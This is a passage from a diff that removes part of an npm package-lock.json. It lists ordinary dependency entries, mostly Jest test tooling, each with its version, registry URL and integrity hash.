"https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==" - }, - "detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true - }, - "diff-sequences": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.4.3.tgz", - "integrity": "sha512-ofrBgwpPhCD85kMKtE9RYFFq6OC1A89oW2vvgWZNCwxrUpRUILopY7lsYyMDSjc8g6U6aiO0Qubg6r4Wgt5ZnA==", - "dev": true - }, - "electron-to-chromium": { - "version": "1.4.455", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.455.tgz", - "integrity": "sha512-8tgdX0Odl24LtmLwxotpJCVjIndN559AvaOtd67u+2mo+IDsgsTF580NB+uuDCqsHw8yFg53l5+imFV9Fw3cbA==", - "dev": true - }, - "emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "requires": { - "is-arrayish": "^0.2.1" - } - }, - "escalade": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", - "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", - "dev": true - }, - "escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true - }, - "esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true - }, - "execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "requires": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - } - }, - "exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true - }, - "expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-XEdDLonERCU1n9uR56/Stx9OqojaLAQtZf9PrCHH9Hl8YXiEIka3H4NXJ3NOIBmQJTg7+j7buh34PMHfJujc8g==", - "dev": true, - "requires": { - "@jest/expect-utils": "^29.6.1", - "@types/node": "*", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1" - } - }, - "fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", - "dev": true - }, - "fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "requires": { - "bser": "2.1.1" - } - }, - "fill-range": { - "version": "7.1.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", - "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", - "dev": true, - "requires": { - "to-regex-range": "^5.0.1" - } - }, - "find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "requires": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - } - }, - "follow-redirects": { - "version": "1.15.6", - "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.15.6.tgz", - "integrity": "sha512-wWN62YITEaOpSK584EZXJafH1AGpO8RVgElfkuXbTOrPX4fIfOyEpW/CsiNd8JdYrAoOvafRTOEnvsO++qCqFA==" - }, - "form-data": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.0.tgz", - "integrity": "sha512-ETEklSGi5t0QMZuiXoA/Q6vcnxcLQP5vdugSpuAyi6SVGi2clPPp+xgEhuMaHC+zGgn31Kd235W35f7Hykkaww==", - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.8", - "mime-types": "^2.1.12" - } - }, - "fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "fsevents": { - "version": "2.3.2", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", - "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", - "dev": true, - "optional": true - }, - "function-bind": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", - "integrity": "sha512-yIovAzMX49sF8Yl58fSCWJ5svSLuaibPxXQJFLmBObTuCr0Mf1KiPopGM9NiFjiYBCbfaa2Fh6breQ6ANVTI0A==", - "dev": true - }, - "gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true - }, - "get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true - }, - "get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true - }, - "get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true - }, - "glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "requires": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - } - }, - "globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true - }, - "graceful-fs": { - "version": "4.2.11", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", - "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", - "dev": true - }, - "has": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", - "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", - "dev": true, - "requires": { - "function-bind": "^1.1.1" - } - }, - "has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true - }, - "html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true - }, - "import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "requires": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - } - }, - "imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true - }, - "inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "requires": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "is-core-module": { - "version": "2.12.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.12.1.tgz", - "integrity": "sha512-Q4ZuBAe2FUsKtyQJoQHlvP8OvBERxO3jEmy1I7hcRXcJBGGHFh/aJBswbXuS9sgrDH2QUO8ilkwNPHvHMd8clg==", - "dev": true, - "requires": { - "has": "^1.0.3" - } - }, - "is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true - }, - "is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true - }, - "is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true - }, - "is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true - }, - "isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", - "dev": true - }, - "istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true - }, - "istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "requires": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - } - }, - "istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", - "dev": true, - "requires": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^3.0.0", - "supports-color": "^7.1.0" - } - }, - "istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "requires": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - } - }, - "istanbul-reports": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", - "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", - "dev": true, - "requires": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - } - }, - "jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.6.1.tgz", - "integrity": "sha512-Nirw5B4nn69rVUZtemCQhwxOBhm0nsp3hmtF4rzCeWD7BkjAXRIji7xWQfnTNbz9g0aVsBX6aZK3n+23LM6uDw==", - "dev": true, - "requires": { - "@jest/core": "^29.6.1", - "@jest/types": "^29.6.1", - "import-local": "^3.0.2", - "jest-cli": "^29.6.1" - } - }, - "jest-changed-files": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.5.0.tgz", - "integrity": "sha512-IFG34IUMUaNBIxjQXF/iu7g6EcdMrGRRxaUSw92I/2g2YC6vCdTltl4nHvt7Ci5nSJwXIkCu8Ka1DKF+X7Z1Ag==", - "dev": true, - "requires": { - "execa": "^5.0.0", - "p-limit": "^3.1.0" - } - }, - "jest-circus": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.6.1.tgz", - "integrity": "sha512-tPbYLEiBU4MYAL2XoZme/bgfUeotpDBd81lgHLCbDZZFaGmECk0b+/xejPFtmiBP87GgP/y4jplcRpbH+fgCzQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^0.7.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.6.1", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "p-limit": "^3.1.0", - "pretty-format": "^29.6.1", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-cli": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.6.1.tgz", - "integrity": "sha512-607dSgTA4ODIN6go9w6xY3EYkyPFGicx51a69H7yfvt7lN53xNswEVLovq+E77VsTRi5fWprLH0yl4DJgE8Ing==", - "dev": true, - "requires": { - "@jest/core": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "import-local": "^3.0.2", - "jest-config": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "prompts": "^2.0.1", - "yargs": "^17.3.1" - } - }, - "jest-config": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.6.1.tgz", - "integrity": "sha512-XdjYV2fy2xYixUiV2Wc54t3Z4oxYPAELUzWnV6+mcbq0rh742X2p52pii5A3oeRzYjLnQxCsZmp0qpI6klE2cQ==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.6.1", - "@jest/types": "^29.6.1", - "babel-jest": "^29.6.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.6.1", - "jest-environment-node": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - } - }, - "jest-diff": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.6.1.tgz", - "integrity": "sha512-FsNCvinvl8oVxpNLttNQX7FAq7vR+gMDGj90tiP7siWw1UdakWUGqrylpsYrpvj908IYckm5Y0Q7azNAozU1Kg==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "diff-sequences": "^29.4.3", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - } - }, - "jest-docblock": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.4.3.tgz", - "integrity": "sha512-fzdTftThczeSD9nZ3fzA/4KkHtnmllawWrXO69vtI+L9WjEIuXWs4AmyME7lN5hU7dB0sHhuPfcKofRsUb/2Fg==", - "dev": true, - "requires": { - "detect-newline": "^3.0.0" - } - }, - "jest-each": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.6.1.tgz", - "integrity": "sha512-n5eoj5eiTHpKQCAVcNTT7DRqeUmJ01hsAL0Q1SMiBHcBcvTKDELixQOGMCpqhbIuTcfC4kMfSnpmDqRgRJcLNQ==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "jest-util": "^29.6.1", - "pretty-format": "^29.6.1" - } - }, - "jest-environment-node": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.6.1.tgz", - "integrity": "sha512-ZNIfAiE+foBog24W+2caIldl4Irh8Lx1PUhg/GZ0odM1d/h2qORAsejiFc7zb+SEmYPn1yDZzEDSU5PmDkmVLQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - } - }, - "jest-get-type": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.4.3.tgz", - "integrity": "sha512-J5Xez4nRRMjk8emnTpWrlkyb9pfRQQanDrvWHhsR1+VUfbwxi30eVcZFlcdGInRibU4G5LwHXpI7IRHU0CY+gg==", - "dev": true - }, - "jest-haste-map": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.6.1.tgz", - "integrity": "sha512-0m7f9PZXxOCk1gRACiVgX85knUKPKLPg4oRCjLoqIm9brTHXaorMA0JpmtmVkQiT8nmXyIVoZd/nnH1cfC33ig==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-leak-detector": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.6.1.tgz", - "integrity": "sha512-OrxMNyZirpOEwkF3UHnIkAiZbtkBWiye+hhBweCHkVbCgyEy71Mwbb5zgeTNYWJBi1qgDVfPC1IwO9dVEeTLwQ==", - "dev": true, - "requires": { - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - } - }, - "jest-matcher-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.6.1.tgz", - "integrity": "sha512-SLaztw9d2mfQQKHmJXKM0HCbl2PPVld/t9Xa6P9sgiExijviSp7TnZZpw2Fpt+OI3nwUO/slJbOfzfUMKKC5QA==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - } - }, - "jest-message-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.6.1.tgz", - "integrity": "sha512-KoAW2zAmNSd3Gk88uJ56qXUWbFk787QKmjjJVOjtGFmmGSZgDBrlIL4AfQw1xyMYPNVD7dNInfIbur9B2rd/wQ==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.1", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-mock": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.6.1.tgz", - "integrity": "sha512-brovyV9HBkjXAEdRooaTQK42n8usKoSRR3gihzUpYeV/vwqgSoNfrksO7UfSACnPmxasO/8TmHM3w9Hp3G1dgw==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-util": "^29.6.1" - } - }, - "jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "requires": {} - }, - "jest-regex-util": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.4.3.tgz", - "integrity": "sha512-O4FglZaMmWXbGHSQInfXewIsd1LMn9p3ZXB/6r4FOkyhX2/iP/soMG98jGvk/A3HAN78+5VWcBGO0BJAPRh4kg==", - "dev": true - }, - "jest-resolve": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.6.1.tgz", - "integrity": "sha512-AeRkyS8g37UyJiP9w3mmI/VXU/q8l/IH52vj/cDAyScDcemRbSBhfX/NMYIGilQgSVwsjxrCHf3XJu4f+lxCMg==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - } - }, - "jest-resolve-dependencies": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.6.1.tgz", - "integrity": "sha512-BbFvxLXtcldaFOhNMXmHRWx1nXQO5LoXiKSGQcA1LxxirYceZT6ch8KTE1bK3X31TNG/JbkI7OkS/ABexVahiw==", - "dev": true, - "requires": { - "jest-regex-util": "^29.4.3", - "jest-snapshot": "^29.6.1" - } - }, - "jest-runner": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.6.1.tgz", - "integrity": "sha512-tw0wb2Q9yhjAQ2w8rHRDxteryyIck7gIzQE4Reu3JuOBpGp96xWgF0nY8MDdejzrLCZKDcp8JlZrBN/EtkQvPQ==", - "dev": true, - "requires": { - "@jest/console": "^29.6.1", - "@jest/environment": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.4.3", - "jest-environment-node": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-leak-detector": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-resolve": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-util": "^29.6.1", - "jest-watcher": "^29.6.1", - "jest-worker": "^29.6.1", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - } - }, - "jest-runtime": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.6.1.tgz", - "integrity": "sha512-D6/AYOA+Lhs5e5il8+5pSLemjtJezUr+8zx+Sn8xlmOux3XOqx4d8l/2udBea8CRPqqrzhsKUsN/gBDE/IcaPQ==", - "dev": true, - 